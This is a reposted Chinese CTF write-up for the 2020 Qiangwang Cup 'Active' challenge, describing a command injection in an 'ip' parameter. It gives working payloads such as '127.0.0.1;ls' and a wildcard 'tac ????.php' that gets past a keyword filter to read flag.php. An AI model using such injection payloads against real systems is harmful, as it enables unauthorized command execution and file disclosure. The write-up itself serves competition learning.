2020第四屆"強網杯"全國網絡安全挑戰賽-主動


主動

 

 打開環境

 

 

一個很明顯的 命令注入

直接傳遞 127.0.0.1;ls 看看

 

 

顯示出來了 

命令注入無疑

過濾了 flag ,那我們要讀取flag.php 里面的東西 

可以使用通配符  

 

 測試一下

 

 

成功輸出 flag.php

嘗試使用cat 讀出flag        payload:?ip=127.0.0.1;cat%20????.php

 

cat 命令沒有回顯  感謝評論大佬提示   使用cat命令 用f12 可以查看

 

 

這里不是過濾了cat,是因為flag.php里內容是php代碼,所以顯示不出來,用tac倒序使得<?php和flag顛倒,先讀到了flag   感謝評論大佬

那么使用 tac 命令 ( tac     從最后一行倒序顯示內容,並將所有內容輸出)

payload: ?ip=127.0.0.1;tac%20????.php

 

 

成功讀取

flag打碼

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM